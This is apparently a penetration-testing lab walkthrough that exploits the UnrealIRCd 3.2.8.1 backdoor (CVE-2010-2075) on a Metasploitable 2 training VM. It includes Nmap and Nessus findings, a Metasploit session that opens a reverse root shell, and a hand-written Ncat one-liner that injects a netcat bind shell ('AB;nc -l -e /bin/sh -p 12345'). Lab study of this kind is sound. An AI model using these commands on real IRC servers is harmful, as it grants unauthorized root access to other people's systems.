The Nmap scan of Metasploitable 2 revealed:
PORT     STATE SERVICE VERSION
6667/tcp open  irc     Unreal ircd
6697/tcp open  irc     Unreal ircd
UnrealIRCd is an Internet Relay Chat (IRC) server daemon.
This exploit has been made nice and easy for us:
On port 6667, Metasploitable 2 runs the UnrealIRCd IRC daemon. This version contains a backdoor that went unnoticed for months – triggered by sending the letters “AB” followed by a system command to the server on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell, as shown below.
The Nessus scan reported:
Port 6667/tcp
46882 – UnrealIRCd Backdoor Detection
Synopsis
The remote IRC server contains a backdoor.
Description
The remote IRC server is a version of UnrealIRCd with a backdoor that allows an attacker to execute arbitrary code on the affected host.
See Also
http://seclists.org/fulldisclosure/2010/Jun/277
http://seclists.org/fulldisclosure/2010/Jun/284
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
Solution
Re-download the software, verify it using the published MD5 / SHA1 checksums, and re-install it.
Risk Factor
Critical
CVSS Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS Temporal Score
8.3 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
References
BID 40820
CVE CVE-2010-2075
XREF OSVDB:65445
Exploitable with
CANVAS (true) Metasploit (true)
Plugin Information:
Publication date: 2010/06/14, Modification date: 2013/02/06
Ports
tcp/6667
The remote IRC server is running as :
uid=0(root) gid=0(root)
As this Nessus scan advises us that this is exploitable via Metasploit, let’s give it a go:
msf > search ircd
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                        Disclosure Date  Rank       Description
   ----                                        ---------------  ----       -----------
   exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  6667             yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to 192.168.1.103:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo kt8lsphf0nxKGdOA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "kt8lsphf0nxKGdOA\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.78:4444 -> 192.168.1.103:39851) at 2013-11-20 12:33:44 +0000

whoami
root
Success.
Because the backdoor is triggered by sending the letters “AB” followed by a system command on any port the daemon listens on, we can get a root shell by hand with Ncat instead of Metasploit. Here the command we ask the daemon to run is a netcat bind shell on port 12345; in the first terminal we input:
# echo "AB;nc -l -e /bin/sh -p 12345" | ncat 192.168.1.103 6697
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Found your hostname (cached)
Then we open Ncat and connect to the backdoor using another terminal:
# ncat 192.168.1.103 12345
whoami
root
Job done.